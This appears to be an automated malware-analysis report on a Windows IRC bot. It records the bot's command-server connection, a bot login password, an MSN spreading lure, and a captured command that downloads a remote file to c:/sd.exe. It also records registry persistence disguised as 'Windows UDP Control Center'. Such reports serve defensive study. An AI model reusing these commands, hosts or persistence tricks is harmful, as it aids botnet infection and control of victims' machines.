Unknown Connections
Host By Name:
Requested Host: home-off-d5f0ac
Resulting Address: 172.16.2.61
Requested Host: sip4.voipkosovasite.com
Resulting Address: 82.114.87.46
Connection Established: 0
Socket: 0
Outgoing Connections
IRC Data
User Name: XP-5101
Host Name: *
Server Name:
Real Name: HOME-OFF-D5F0AC
Nick Name: [00|USA|169352]
Non RFC Conform: 1
Channel
Name: #!a!
Topic Deleted: :.msn.stop|.msn.msg foto? http://xhena.xh.ohost.de/viewimage.php?=
Private Message Deleted
Value: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.login mamajokero -s
Value: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.r.getfile http://82.114.87.46/set.jpg c:/sd.exe 1 -s
Notice Message Deleted
Value: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname…
Value: :irc.priv8net.com NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
Transport Protocol: TCP
Remote Address: 82.114.87.46
Remote Port: 1868
Protocol: IRC
Connection Established: 1
Socket: 1656
Other details
The following port was open in the system:
Port    Protocol    Process
1052    TCP         winudpmgr.exe (%Windir%\winudpmgr.exe)
Registry Modifications
The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Windows UDP Control Center = “winudpmgr.exe”
so that winudpmgr.exe runs every time Windows starts
Memory Modifications
There were new processes created in the system:
Process Name                     Process Filename                          Main Module Size
winudpmgr.exe                    %Windir%\winudpmgr.exe                    307.200 bytes
[filename of the sample #1]      [file and pathname of the sample #1]      307.200 bytes